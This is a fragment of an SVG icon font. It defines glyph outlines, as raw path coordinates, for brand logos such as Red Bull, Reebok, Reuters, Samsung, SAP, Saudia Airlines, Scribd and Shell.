<glyph glyph-name="brand-redbull" horiz-adv-x="1000" unicode="&#xe92a;" d="M666 459c12 8 24 9 37 0 5-3 9-8 14-12 3-3 6-5 10-6 13-3 26-6 37-14 2-1 4-3 6-4 5-6 12-8 19-9 8-1 16-4 22-9 11-9 22-15 36-17 18-3 32-12 46-21 7-5 15-10 22-14 9-4 19-6 29-3 11 3 16 14 13 24-3 10-10 16-16 23-6 6-13 12-18 19-8 9-6 20 3 27 8 6 16 10 26 12 7 1 14 3 19 10 2-5 3-10 2-14-1-17-11-25-29-27-1 0-2 0-3 0-4-1-5-4-3-7 2-2 4-4 6-6 9-8 17-16 23-26 15-29-8-53-32-53-6 0-11 1-17 2-5 1-6-1-5-6 4-11 3-23-2-34-3-8 4-14 10-15 4 0 7 0 10 0 4 0 6-2 8-6 1-5 3-9 4-14 1-4 3-7 5-9 5-4 9-8 13-13 3-3 6-7 11-8 1 0 2-1 3-2 1-4 2-9 4-14 0-2-1-3-2-3-11-1-21-1-27 10-4 6-6 6-13 3-6-3-12-1-17 3-6 4-12 8-18 11-10 5-20 6-31 3-4-1-9 0-13 2-4 3-10 5-14 9-3 2-5 5-7 9-2 6-3 13-5 20 0 1 1 3 2 4 0-1 2-2 2-3 4-8 9-17 17-22 11-7 22-9 34-7 14 3 27-2 39-11 2-1 4-3 6-5 1 0 2 0 3 0 0 1 0 2 0 2-13 15-27 24-48 22-16-2-29 3-38 17-6 9-9 19-10 29-1 7-3 12-5 18 0 3-1 4-4 4-3-1-2-3-2-5 1-5 3-11 3-16 2-15-4-23-20-23-2-1-5-1-8 0-15 1-30-1-45-2-6-1-12-1-19-1 1 3 2 6 3 8 0 2-1 5-2 5-3 2-4 0-5-3-3-10-10-16-20-19-1-1-2-1-3-2-4-4-9-9-13-13-2-2-2-5 0-8 2-3 5-5 8-7 4-2 9-3 13-4 4-1 8 1 10 5 1 3 2 6 4 9 2 4 5 6 10 6 5 0 9 0 14 0s5-2 3-6c-2-3-3-6-5-8-2-3-4-6-9-6-3 0-5-2-5-5-1-4-2-8-6-11-5-4-10-5-15-3-10 3-20 6-29 9-3 1-5 2-7 4-3 3-6 4-10 4-5-1-6-1-9 5-41-56-95-88-165-88-70 1-125 32-165 88-3-2-6-5-9-6-3-1-6-1-8-1-2 0-5-1-7-2-11-4-23-9-35-13-7-2-13 0-17 6-3 2-4 5-6 9-2 3-5 5-8 4-4-1-7 0-8 4-3 4-5 8-8 12-1 3 0 6 3 6 6 1 11 2 17 2 4 0 7-2 9-5 3-4 5-9 8-12 5-8 9-9 18-7 4 2 9 4 13 6 4 3 5 7 3 11-2 8-7 14-14 18-4 2-7 4-10 6-7 5-12 11-14 19-1 3-1 5-4 4-3-1-2-3-2-5 3-8 0-12-9-12-12 0-25 1-38 1-5 0-10-1-15-2-4 0-7 0-10 1-8 1-12 7-11 18 1 6 2 12 3 19 0 2 0 4-2 4-3 0-4 0-5-3-1-8-3-16-4-25-2-13-10-22-21-28-10-5-20-7-31-7-11 0-23-2-33-8-4-3-8-7-12-11-2-1-2-3-3-5 0-1 0-2 0-4 1 1 3 1 3 2 9 9 20 15 32 17 4 0 9 0 13 1 8 0 16 0 24 1 9 1 16 5 21 12 4 4 7 9 10 13 1 1 2 2 4 3 1-2 2-4 3-6 0 0 0-1-1-2-3-6-6-12-10-18-1-2-4-4-7-5-4-3-7-4-11-7-7-4-14-5-22-4-6 1-11 2-17 2-6 1-11-1-15-6-5-5-11-7-16-10-4-2-7-2-11-1-8 2-10 1-14-5-7-14-14-15-27-12-1 1-3 1-5 1 1 5 2 10 4 15 1 3 3 5 6 6 3 1 6 4 8 7 3 3 6 6 9 8 8 4 14 9 16 18 0 2 1 4 2 5 2 5 5 7 10 7 8-1 15 3 22 8 4 2 5 5 3 9-2 8-4 16-6 24-1 4 0 8 0 11 0 5-1 6-6 5-8-3-17-4-26-2-32 6-39 35-29 55 4 7 11 13 18 19 3 4 8 7 12 11 2 2 4 4 3 7-1 3-3 3-6 3-3 1-6 1-9 1-15 0-29 16-26 31 0 2 1 5 2 8 2-1 3-2 4-3 9-7 19-10 29-12 6-1 11-3 16-5 10-6 13-20 6-29-5-6-11-11-17-16-5-5-10-9-14-14-14-15-7-37 12-42 8-2 16 0 22 4 10 4 19 9 27 15 14 11 28 19 46 20 13 1 23 7 32 16 8 8 17 13 29 14 1 0 2 0 2 0 7-2 12 1 16 5 10 12 23 17 37 21 10 3 19 7 28 13 10 8 22 10 34 8 3-1 3 1 4 2 21 29 47 51 80 66 79 36 173 15 230-51 6-6 11-13 16-20z m-23-198c1-3 1-6 2-8 1-9-7-15-15-13-3 1-6 2-10 4-8 3-17 6-27 4-6-2-11 1-15 5-1 1-2 1-3 2-2 3-4 3-7 0-6-5-13-11-20-15-3-2-9-3-13-4-1 0-3 1-3 2 0 0 1 2 1 3 1 0 2 1 2 1 5 5 9 11 13 16 3 4 5 9 8 13 1 2 2 4 3 6 0 1 0 2 0 3 0 0-2 0-2-1-1 0-2-1-3-2-5-7-10-13-14-20-5-6-11-9-18-9-2-1-5 0-6 1-1 3 2 3 3 5l2 1c13 9 21 22 26 37 6 19 11 39 16 58 6 19 14 37 29 49 14 12 28 24 42 35 9 6 17 12 26 19-45 61-104 91-180 84-56-6-100-34-133-79 4-3 8-5 11-8 6-4 11-9 16-13 23-18 42-39 58-63 3-6 6-13 7-20 2-20 7-40 15-59 0-2 2-4 3-5 3-5 7-9 10-13 6-9 11-18 21-22 1 0 2-1 2-2-1 0-2-1-2-1-2-1-5-1-7-1-10 2-16 9-22 17-3 5-7 10-12 15-1 1-4 2-5 3l-1-1c0-1 1-2 2-3 3-6 7-12 10-18 3-8 7-13 14-17l8-5c1 0 2-2 2-3-1 0-2-1-3-1-13 0-24 4-33 13-5 6-7 6-13 1-5-4-10-8-17-7-10 2-19 0-28-3-5-2-11-3-17-4-4-1-8 2-9 5-2 7-2 14 3 19 1 1 1 2 1 3-1 0-2 1-3 0-4 0-5 1-4 4 2 4 5 7 8 10 3 3 5 6 6 10 1 3 3 6 5 9 1 1 1 2 2 3-1 0-1 1-2 1-7-1-15-3-23-4-3-1-7-2-11-2-6 0-6 2-3 7 5 8 7 18 6 28 0 1-2 3-3 4-1-1-2-2-3-4-1-4-1-8-2-12-2-11-7-20-20-20-1 0-2-1-3-1-3-1-4-3-3-6 0-1 1-2 2-4 4-7 7-14 12-21 3-6 3-11 2-16-1-2-2-4-2-6 0-1-1-2-1-4 2 1 2 1 3 1 9 8 11 17 5 27l0 1-11 21c6 4 12 2 15-4 3-6 6-12 9-17 3-6 4-11 1-17-1-2-1-4 0-5 4-6 7-11 11-16 47-54 105-79 176-68 57 8 100 38 131 86 1 1 1 3 1 5-1 5-1 9 1 13 4 6 7 12 10 18 5 8 5 9 15 3l0 0c-1-2-1-3-2-4-4-6-7-11-11-16-3-5-1-19 4-21 0 0 0 1 0 2-1 8 1 14 5 20 4 5 7 10 10 14 2 4 2 8 0 10-1 2-3 4-5 5-10 5-15 13-16 23-1 7-1 14-2 21 0 3-1 6-4 6-2 0-3-2-4-5 0-5 0-10 0-16 1-9 5-18 9-27 2-4 1-5-4-5-14-1-27 2-38 13 0 0 0 0-1 1-1 0-2 0-3 1 0-1 0-3 0-4 3-4 6-7 8-11 3-4 5-7 8-10 2-4 4-8 6-11 1-3 3-6 4-9 2-4 0-6-4-6-1 1-2 1-5 1z m-66 43c1 0 1-2 2-3 1 1 2 2 3 4 2 3 3 7 5 10 3 3 7 6 10 8 4 3 6 2 9-1 1-2 3-2 4-3 1 2 2 4 1 5-2 5-4 9-7 13-2 3-4 3-7 0l-13-15c-4-5-6-10-7-18z m-172 20c1-1 1-1 2-1l3 4c4 5 7 5 12 0 5-4 8-10 8-17 0-1 1-2 1-3 1 1 2 2 2 2 1 3 2 7 2 10-2 10-10 16-15 24-1 1-1 1-1 1-3 2-5 1-6-2-2-4-4-8-6-12-1-2-1-4-2-6z m250 62c5 12 15 20 24 29 0 0 1 1 1 2 2 2 3 4 1 6-2 2-4 1-6 0-8-7-15-14-19-23-2-5-3-9-1-14z m-309-8l1 1c3 8 3 17-1 25-1 3-3 5-5 7-1 1-3 1-4 0-1 0-1-2-1-3 0-2 1-3 1-4 3-5 5-10 7-16 1-3 2-6 2-10z m58-113c9 0 12 2 12 8 0 3-1 4-4 4-4-1-7-4-9-8-1-1-2-2-1-3 0-1 2-1 2-1z m201-3c1 0 4 0 3 3 0 4-5 9-10 8-1 0-2-2-2-3 0-5 3-8 9-8z m-324-19c-4 0-6 2-7 4-2 5-3 10-8 13-2 2 0 3 2 4 5 0 10 0 16 0 1 0 3-1 4-3 1-3 2-7 3-10 1-1 0-3-1-3-3-2-6-4-9-5z m708-6c3 0 7-4 7-8 1-5 1-9 3-13 2-2 1-4-1-4-10-5-10-5-13 6-1 3-2 7-3 11-1 3 3 8 7 8z m-977-27c-4 1-8 2-11 3-1 0-1 3-1 4 4 3 4 8 4 13 0 3 2 6 5 8 1 0 2 0 3 0 4-2 6-6 5-11-2-5-3-11-5-17z m706 51l8 1c2 0 3-1 3-4-1-4-3-8-4-12 0 0 0-1-1-1-5-3-9-1-13 1-3 1-4 4-3 7 1 7 3 8 10 8z m256-24c-1 0-3 0-3 1-4 4-7 9-10 13 0 1 2 4 3 5 1 1 4 1 5 0 4-2 7-5 10-7 2-2 4-4 2-7-2-2-4-4-6-6-1 1-1 1-1 1z m-947 1c-4 0-7 1-8 4-1 3 0 6 3 8 3 2 6 4 9 6 2 2 4 2 6 0s3-4 1-6c-2-3-4-6-6-9-2-1-4-2-5-3z" />
<glyph glyph-name="brand-reebok" horiz-adv-x="1000" unicode="&#xe92b;" d="M315 517c-3 1-6 2-9 1-22-2-45-4-67-8-69-9-137-21-205-34-12-3-23-5-34-9 3 0 6-1 8-1 43-2 85-6 127-12 66-10 130-24 194-42 101-27 199-65 296-105l60-26 0 0c-1 1-2 2-3 2-122 78-245 156-367 234z m171-71c2-1 2-2 3-2 40-28 80-56 120-84 2-2 3-1 5 0 12 6 24 12 35 18 98 47 199 83 304 110 15 4 31 7 47 11-173-2-344-20-514-53z m-107-77c-1 1-1 1-2 1-29 8-58 16-87 24-2 1-4 0-5 0-44-14-87-31-128-51-53-27-101-60-148-95-1-1-2-1-1-3 46-8 92-16 139-24 3 0 5 0 8 3 10 11 21 21 32 31 53 44 113 79 176 107 5 3 10 5 16 7z m57-23c-43-19-85-43-124-70-26-19-52-38-73-62-2-2-5-4-6-7 1 0 1-1 1-1l142-24c2-1 4 0 5 2 3 4 6 7 9 11 32 37 70 68 110 95 13 8 26 16 39 25-33 11-64 22-96 33-3 0-5-1-7-2z" />
<glyph glyph-name="brand-reuters" horiz-adv-x="1000" unicode="&#xe92c;" d="M431 232c-6-3-9-12-5-18 3-7 11-9 18-6 6 4 8 12 5 19-4 6-11 9-18 5z m63-17c-4 7-13 10-21 6-7-4-10-14-6-21 4-7 13-10 21-6 7 4 10 13 6 21z m-12 262c8 5 11 15 7 23-4 9-15 12-24 7-8-4-11-14-6-23 4-9 15-12 23-7z m24 9c3-8 12-10 20-6 8 3 10 13 6 20-4 8-13 10-20 6-8-3-10-13-6-20z m28-293c8 5 11 15 6 24-4 8-14 11-23 6-8-4-11-14-7-23 5-8 16-11 24-7z m-178 212c4-7 14-10 21-6 8 4 10 14 6 21-4 7-13 10-20 6-8-4-11-13-7-21z m21-132c5 3 7 9 4 13-2 5-8 7-13 4-4-2-6-8-4-13 3-4 9-6 13-4z m33-22c-3 6-10 8-15 5-6-3-8-10-5-16s9-7 15-4c6 3 8 10 5 15z m-23 214c-8-5-11-15-6-23 4-8 14-12 23-7 8 4 11 15 7 23-5 8-15 12-24 7z m-19-135c-3 5-10 8-15 5-6-4-8-10-5-16 3-5 10-8 16-4 5 2 7 9 4 15z m188 162c-7-4-9-12-6-18 4-7 12-9 18-5 7 3 9 11 6 18-4 6-12 8-18 5z m-211-129c4-6 12-9 18-5 7 3 9 11 6 18-4 6-12 8-19 5-6-3-8-12-5-18z m96 97c9 5 12 17 7 26-5 9-17 13-26 8-9-5-13-17-8-26 5-9 17-13 27-8z m190-89c3-6 10-8 16-5 5 3 7 10 4 15-3 6-10 8-15 5-5-3-8-10-5-15z m-9 56c-5-2-6-8-4-13 3-5 9-6 13-4 5 3 6 8 4 13-3 5-8 6-13 4z m32-89c-4 6-11 8-18 5-7-4-9-12-6-18 4-7 12-9 19-5 6 3 9 11 5 18z m-11-43c-4 7-13 10-21 6-7-4-10-13-6-20 4-8 13-10 21-7 7 4 10 14 6 21z m-49 169c-6-3-8-9-5-15 3-6 10-8 16-5 5 3 7 10 4 16-3 6-10 8-15 4z m-35-224c-9-5-13-16-8-26 5-9 17-13 26-7 10 5 13 17 8 26-5 9-17 13-26 7z m53-4c8 4 11 15 7 23-5 8-15 11-24 7-8-5-11-15-6-24 4-8 15-11 23-6z m70 166c8-2 16 2 18 10 3 8-2 17-10 19-8 2-17-2-19-10-2-8 2-17 11-19z m-151 145c-3-13 4-27 17-31 14-4 27 3 31 17 5 13-3 27-17 31-13 4-27-4-31-17z m-167-36c-2-8 2-17 11-19 8-2 16 2 18 11 3 8-2 16-10 18-8 3-16-2-19-10z m271-322c2 8-2 17-10 19-8 2-17-2-19-11-2-7 2-16 10-18 8-2 17 2 19 10z m-3 318c4 11-3 24-14 27-12 4-24-3-27-15-4-11 3-23 14-27 12-3 24 3 27 15z m-250-341c12-3 24 3 27 15 3 11-3 23-15 27-11 3-23-3-27-15-3-11 3-23 15-27z m-44 45c10-3 21 3 24 13 3 10-3 21-13 24-11 3-21-3-24-13-4-10 2-21 13-24z m-5 239c7-2 13 2 15 9 2 6-2 13-8 15-7 2-14-2-15-9-2-6 2-13 8-15z m95 68c10-3 21 2 24 13 3 10-3 21-13 24-10 3-21-3-24-13-3-10 3-21 13-24z m60 9c12-4 24 3 27 14 3 12-3 24-14 28-12 3-24-4-27-15-4-12 2-24 14-27z m187-61c3 10-3 21-13 24-10 2-21-4-24-14-3-10 3-21 13-24 10-3 21 3 24 14z m-366-197c8-2 17 3 19 11 2 8-2 16-10 18-9 3-17-2-19-10-2-8 2-16 10-19z m400 83c2 7-2 14-8 16-7 2-14-2-16-9-2-6 2-13 9-15 6-2 13 2 15 8z m-402 45c5-2 10 1 12 6 1 5-2 10-7 12-4 1-10-2-11-7-1-4 1-10 6-11z m7-56c2 7-2 13-9 15-6 2-13-2-15-8-2-7 2-13 8-15 7-2 14 2 16 8z m373-56c5-1 10 2 11 7 1 4-1 10-6 11-5 1-10-1-11-6-2-5 1-10 6-12z m-219-132c4 14-4 28-17 32-13 3-27-4-31-17-4-14 4-27 17-31 13-4 27 3 31 16z m104 30c-10 3-21-3-25-13-2-10 4-21 14-24 10-4 21 2 23 13 3 10-2 20-12 24z m94 68c-6 1-13-2-15-9-2-7 2-13 8-15 7-2 14 2 16 8 1 6-2 14-9 16z m-155-78c-11 4-23-3-27-14-3-12 3-24 15-27 11-4 23 3 27 14 3 12-3 24-15 27z m121 396c11 12 10 29-1 40-11 10-28 10-39-1-11-12-10-29 1-40 11-10 29-10 39 1z m26-50c13-13 34-12 46 1 12 13 11 33-2 46-13 12-33 11-45-2-12-13-12-33 1-45z m-317-337c-13 12-33 11-45-2-12-13-12-33 1-45 13-12 34-12 45 1 12 13 12 34-1 46z m-88 188c7 8 6 21-1 28-8 7-20 7-28-1-7-8-7-20 1-28 8-7 20-7 28 1z m36-166c10 12 10 29-1 40-12 10-29 10-40-2-10-11-10-28 1-39 12-10 29-10 40 1z m-30 80c9 10 8 26-1 35-10 10-26 9-35-1-10-10-9-25 1-34 10-10 25-10 35 0z m292 310c10 10 9 26-1 35-10 10-25 9-35-1-9-10-8-25 1-35 10-9 26-9 35 1z m-86 2c7 7 7 20-1 27-8 8-20 7-28-1-7-8-7-20 1-27 8-7 20-7 28 1z m70-491c-8-8-7-20 0-28 8-7 20-7 28 1 7 8 7 20-1 28-8 7-20 7-27-1z m-87 1c-9-10-8-26 1-35 10-9 26-9 35 1 10 10 9 26-1 35-9 9-25 9-35-1z m279 143c-7-7-6-17 0-23 7-6 17-5 23 1 6 6 5 16-1 22-7 6-17 6-22 0z m-360-118c-11-11-10-29 1-39 11-11 29-10 40 1 10 11 10 28-1 39-12 11-30 10-40-1z m333 47c-5 5-13 5-17 0-4-5-4-13 0-17 5-4 13-4 17 1 5 4 5 12 0 16z m-62-70c6 7 5 17-1 23-7 6-16 6-22-1-6-6-6-16 0-22 7-6 17-6 23 0z m113 350c11 11 10 29-1 39-11 11-29 10-40-1-10-11-10-29 2-39 11-11 29-10 39 1z m-4-128c-8-8-7-20 1-27 8-8 20-8 27 1 7 7 7 20-1 27-7 8-20 7-27-1z m28 87c-10 10-25 9-35-1-9-10-8-25 1-34 10-10 26-9 35 1 10 9 9 25-1 34z m-475 105c5-5 12-4 17 1 4 4 4 12-1 16-5 5-12 5-17 0-4-5-4-13 1-17z m-27-70c6 6 5 16-1 22-6 6-16 6-22-1-6-6-6-16 1-22 6-6 16-5 22 1z m89 140c-7-6-6-16 0-22 7-6 16-6 23 0 5 7 5 17-1 23-7 6-17 6-22-1z m-159-47c7-9 21-12 30-5 10 7 12 20 6 30-7 10-20 12-30 5-10-7-12-20-6-30z m499-478c5-7 16-8 23-2 7 6 9 16 3 23-6 8-16 9-24 3-7-6-8-16-2-24z m15 531c17 5 26 23 21 40-6 17-23 27-41 21-17-5-26-23-21-40 6-17 24-27 41-21z m-96 100c-14-4-22-18-18-32 3-14 17-22 31-19 14 4 23 18 19 32-4 14-18 23-32 19z m-102-7c2-12 13-19 25-17 12 2 19 14 17 25-2 12-14 19-25 17-12-2-19-13-17-25z m315-239c20 8 29 31 20 51-8 20-31 29-51 21-20-9-29-32-20-52 8-19 31-29 51-20z m2-252c12 8 16 24 8 36-7 12-23 16-35 8-13-7-16-24-8-36 7-12 23-16 35-8z m-288-177c-9-1-16-10-15-19 2-9 10-16 19-14 10 1 16 9 15 19-2 9-10 15-19 14z m327 393c-8 18-30 25-48 16-17-8-24-30-16-48 9-17 30-24 48-16 18 9 25 30 16 48z m-137 137c7-18 28-28 46-21 19 7 28 27 21 46-6 18-27 28-45 21-19-7-28-27-22-46z m-107-508c-8-3-12-12-8-20 4-8 13-12 20-8 8 3 12 13 8 20-3 8-12 12-20 8z m242 281c-9 15-29 21-44 12-16-9-22-29-13-44 10-16 29-21 44-12s22 28 13 44z m-591-223c-17-6-26-24-21-41 5-17 24-26 41-21 17 5 26 23 21 40-5 17-24 27-41 22z m96-101c14 4 22 18 19 32-4 14-18 22-32 19-14-4-22-18-19-32 4-14 18-22 32-19z m-80 631c-6 7-17 8-24 3-7-6-9-17-3-24 6-7 16-9 24-3 7 6 8 17 3 24z m498-478c-7 10-21 12-30 5-10-7-12-20-6-30 7-10 21-12 31-5 9 7 12 20 5 30z m-428 500c8 3 12 13 8 20-3 8-12 12-20 8-8-3-12-12-8-20 3-8 13-12 20-8z m-107-508c-7 19-28 28-46 21-19-6-28-27-21-46 6-18 27-27 46-21 18 7 27 28 21 46z m-135 228c9-16 29-22 44-13 16 9 22 29 13 44-9 16-29 21-44 13s-21-29-13-44z m354-366c-2 12-13 19-25 17-12-2-19-14-17-25 3-12 14-19 25-17 12 2 20 13 17 25z m-28 668c9 2 15 10 14 19-1 10-10 16-19 15-9-2-16-10-14-20 1-9 9-15 19-14z m-261-221c12 8 16 24 8 36-8 12-24 16-36 8-12-7-16-23-8-36 8-12 23-15 36-8z m5-279c20 8 29 31 20 51-8 20-31 29-51 21-20-9-29-32-20-52 9-20 32-29 51-20z m-72 107c9-18 30-25 48-16 17 9 25 30 16 48-9 18-30 25-48 16-18-9-25-30-16-48z m757 247c22-2 43 14 45 37 2 23-14 43-37 46-22 2-43-14-45-37-3-23 14-43 37-46z m63-131c-27 0-50-22-50-50 0-27 23-50 50-50 28 0 50 23 50 50 0 28-22 50-50 50z m-60 68c-2-25 18-47 43-48 25-2 47 18 48 43 2 26-18 47-43 48-26 1-47-18-48-43z m-275-527c-11-3-18-15-15-26 3-11 15-18 26-15 11 3 19 14 15 26-3 12-14 18-26 15z m200 128c-18-3-30-20-28-38 3-19 20-31 38-28 18 3 31 20 28 38-3 18-20 30-38 28z m72 100c-23-2-40-23-37-46 2-23 23-39 45-37 23 3 40 23 37 46-2 23-23 39-45 37z m-165-177c-15-4-24-18-21-33 3-15 18-24 32-21 15 3 25 17 22 33-3 14-18 24-33 21z m211 289c-25-2-45-23-44-49 2-25 23-44 49-43 25 1 44 23 43 48-1 26-23 45-48 44z m-211 428c15-4 30 6 33 21 3 15-7 29-21 32-15 4-30-6-33-21-3-15 7-29 21-32z m-644-289c26 1 45 23 44 48-2 25-23 45-49 43-24-1-44-22-43-48 1-25 23-45 48-43z m47 111c22 3 39 23 36 46-2 23-22 39-45 37-23-2-40-23-37-46 3-22 23-39 46-37z m-15-181c0 28-22 50-49 50-28 0-50-22-50-50 0-27 22-50 50-50 27 0 49 23 49 50z m179 359c15 3 24 17 21 32-3 15-18 25-32 21-15-3-25-17-22-32 4-15 18-25 33-21z m107 50c11 3 18 15 15 26-3 12-15 18-26 16-11-3-18-15-15-27 3-11 15-18 26-15z m-275-527c2 26-18 47-43 49-25 1-47-18-48-43-1-26 18-47 43-49 25-1 47 18 48 43z m75 400c19 3 31 20 28 38-3 18-20 30-38 27-18-3-30-19-27-38 2-18 19-30 37-27z m619 0c18-3 35 9 38 27 3 19-10 36-27 39-18 3-36-10-38-28-4-18 9-35 27-38z m-309 143c11 0 20 9 20 20 0 11-9 20-20 20-11 0-20-9-20-20 0-11 9-20 20-20z m-381-606c-23 3-43-14-46-37-2-23 14-43 37-46 23-2 43 14 45 37 3 23-14 44-36 46z m490 590c11-3 23 4 26 15 4 12-4 24-15 27-11 3-23-4-26-16-3-11 4-23 15-26z m-110-834c-11 0-20-8-20-20 0-11 9-20 20-20 11 0 20 9 20 20 1 12-8 20-20 20z m-309 143c-18 3-35-9-38-27-3-19 10-35 28-38 18-3 35 9 38 27 3 18-9 35-28 38z m200-127c-11 3-23-3-26-15-3-11 4-23 15-26 11-3 23 3 26 15 3 11-4 23-15 26z m-107 51c-15 3-30-7-33-21-3-15 7-30 21-33 15-3 30 6 33 21 3 15-6 29-21 33z" />
<glyph glyph-name="brand-samsung" horiz-adv-x="1000" unicode="&#xe92d;" d="M999 437c-13 78-248 102-524 54-115-20-220-50-301-83 12 0 21-3 27-9 4-4 7-10 7-18v-7h-27v6c0 6-4 10-10 10-5 0-8-3-9-7 0-2-1-4 0-6 3-11 43-19 47-41 1-2 2-8 0-17-2-18-18-24-37-24-28 0-39 13-39 31v8h29v-11c0-6 4-9 10-9 6 0 9 3 10 7 1 2 1 5 0 8-5 13-43 19-47 41-1 5-2 9-1 14 1 3 2 6 3 8-90-42-143-89-136-129 13-78 248-102 524-54 121 21 230 52 313 88-1 0-3 0-4 0-19 0-35 7-37 26-1 3-1 5-1 7v44c0 2 1 6 1 7 2 19 17 27 37 27 16 0 35-5 37-27 1-3 1-5 1-6v-5h-28v7c0 0 0 2 0 4-1 2-2 7-10 7-8 0-10-5-10-7-1-2-1-3-1-5v-48c0-2 0-3 0-4 1-1 2-8 11-8s10 7 10 8c0 1 0 2 0 4v14h-10v17h38v-29c0-2 0-3-1-7 0-5-2-9-4-13 88 42 139 87 132 127z m-715-138l-14 94h0l-14-94h-29l19 106h48l19-106h-29z m141 0l-1 92h-1l-17-92h-27l-17 92h-1l0-92h-27l2 106h44l12-79h1l13 79h43l3-106h-27z m127 20c-3-20-23-24-37-24-24 0-38 10-38 31v8h28v-10c0-6 4-9 11-9 5 0 8 2 9 6 1 2 1 6 0 8-5 13-42 20-47 41-1 5-1 9 0 14 3 20 22 24 37 24 13 0 23-3 29-9 4-4 6-10 6-18v-8h-26v7c0 6-4 9-10 9-5 0-8-2-9-7 0-1 0-3 0-5 3-12 43-19 47-40 1-3 1-9 0-18z m99 10c0-2 0-6 0-7-1-18-14-27-37-27s-35 9-37 27c0 1 0 5 0 7v76h27v-79c0-1 0-3 0-4 1-1 2-7 10-7 8 0 10 6 10 7 0 1 0 3 0 4v79h27v-76z m119-29h-39l-25 84h-1l2-84h-27v105h40l24-81h0l-1 81h27v-105z" />
<glyph glyph-name="brand-sap" horiz-adv-x="1000" unicode="&#xe92e;" d="M0 598v-495h505l495 495h-1000z m609-305h-31v-94h-146l-15 45c-15-5-33-8-51-8-19 0-37 3-53 8l-15-45h-89l10 26c-1-1-2-2-4-3-22-18-50-28-84-28l-5-1c-40 0-79 11-112 30l31 61c32-20 53-24 81-24 14 1 25 3 32 10 4 5 6 10 6 16 0 15-22 23-49 31-22 7-47 16-67 31-23 17-34 38-34 68 1 22 9 42 24 58 21 22 56 36 98 36h0c36 0 80-10 112-27l-34-59c-35 17-53 18-72 19-30 2-45-9-45-20 0-14 28-26 54-35 41-13 92-30 99-79l74 196h85l86-234v234h98c95 0 139-34 139-107 0-66-46-105-123-105z m-10 147h-21v-79h21c29 0 52 9 52 40 0 30-23 39-52 39z m-233-32l-32-98c10-4 21-6 32-6 11 0 22 2 31 6l-31 98h0z" />
<glyph glyph-name="brand-saudia-airlines" horiz-adv-x="1000" unicode="&#xe92f;" d="M955 125c-82-144-238-242-416-242-263 0-477 214-477 477 0 88 24 169 65 240h-1c1 0 1 0 1 0 0 1-1 2-2 2 0 0 0-1-1-1h0c-53-77-82-170-82-271 0-265 215-480 481-480 193 0 357 110 434 274 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 1-1 1 0 0-1-1-1-1z m-403 153l13 84h-8l9 83h-9l12 84h-11l9 83c33-43 54-128 60-193 28 50 18 165-10 212 50-28 105-103 137-181 18 73-38 177-98 222 58-11 134-56 207-143-24 116-138 186-206 200 75 8 148-16 214-48-72 83-180 112-251 104 12 13 23 20 41 25-30 14-77 7-95-14 0 0-4 39-26 54v-581l12 9z m-129 451c-68-14-182-84-206-200 73 87 149 132 208 143-60-45-116-149-99-222 32 78 87 153 138 181-29-47-38-162-11-212 7 65 28 150 60 193l10-83h-11l11-84h-9l10-83h-8l12-84 5-3-5 3-39-20v-3h103v3l-40 20-12-9h0l0 581c-22-15-25-54-25-54-19 21-66 28-96 14 18-5 30-12 42-25-72 8-180-21-251-104 66 32 138 56 213 48z m535-463c-90 94-266 5-395-72-8-5-15-10-23-14-7 4-15 9-22 14-129 77-306 166-396 72 103 41 256-35 381-110-36-24-69-48-99-68-48 46-66 39-70 38-5-2-8-7-9-12 0-7 6-13 12-13 7 0 13 5 13 12 0 1 0 2 0 3 13-8 26-19 57-51 50-53 61-52 71-52 7 1 12 6 12 13 0 7-5 13-12 13-7 0-13-6-13-13v-1c-9 6-18 18-36 38 30 18 68 43 111 70 43-27 82-52 112-70-19-20-28-32-37-38 0 1 0 1 0 1 0 7-6 13-12 13-7 0-13-6-13-13 0-7 6-12 13-13 10 0 20-1 71 52 31 32 43 43 56 51 0-1 0-1 0-2 0-8 6-13 13-13 6 0 12 6 12 13 0 5-4 10-8 12-5 1-23 8-70-38-30 21-64 44-100 68 126 75 279 151 381 110z m-684-230c-4 2-8 3-10 1-2-2-1-6 2-10 16-18 51-28 140 22l-23 26c-48-31-86-49-109-39z m532 0c-23-10-61 8-108 38l-24-25c90-50 124-40 140-22 4 4 5 7 3 10-3 2-6 1-11-1z" />
<glyph glyph-name="brand-scribd" horiz-adv-x="1000" unicode="&#xe930;" d="M649-41c-7-9-15-18-24-27-57-55-126-82-207-82-79 0-149 21-210 64-60 43-107 108-139 194l2 1c-3 9-4 19-4 29 0 59 48 108 108 108s108-49 108-108c0-31-12-58-33-78 43-49 97-74 163-74 47 0 86 14 118 42 31 27 46 63 46 105 0 26-8 51-24 77s-37 47-61 64c-24 16-63 35-116 57-53 22-93 41-122 59-28 18-53 39-74 64-21 25-36 50-46 74-9 25-14 51-14 79 0 67 27 125 81 172 55 47 121 71 198 71 52 0 104-11 157-33 44-18 81-45 113-80 22-19 37-48 37-80 0-60-49-108-108-108s-109 48-109 108c0 15 4 30 10 44-22 11-51 16-88 16-46 0-84-10-113-31-29-21-43-47-43-80 0-29 12-54 38-76 25-21 68-45 128-71 61-26 108-50 142-73 34-22 62-47 83-74 22-27 38-55 49-85l1-6c-46-38-76-94-76-159 0-37 12-72 29-103z m159 228c-69 0-125-56-125-124 0-69 56-125 125-125s125 56 125 125-56 124-125 124z" />
<glyph glyph-name="brand-shell" horiz-adv-x="1000" unicode="&#xe931;" d="M875 648c-212 232-551 211-734 16-103-120-163-263-133-450l162-116 21-188 258-1c32-33 73-34 110 1l254 1 21 188 161 120c21 172-26 312-120 429z m34-390l-156-115-15-147-191-1c-29-38-62-35-88-1l-193 0-16 143-159 122c-12 44-7 88 10 135l254-259c8-5 12 0 8 6l-248 304c1 38 24 74 58 109l225-384c7-11 15-8 9 5l-202 421c27 42 63 64 103 77l138-483c4-11 12-10 10 3l-101 503c18 14 40 24 68 28 13 2 29 2 51 1l23-534c-1-17 9-13 9-1l18 533c16 1 32 1 48-1 27-2 54-10 71-25l-95-504c0-7 6-7 9-2l136 484c56-26 89-54 100-78l-196-421c-5-9 3-15 8-8l221 389c31-30 55-63 63-104l-242-304c-11-14-5-18 5-5l246 248c16-36 24-78 11-134z" />
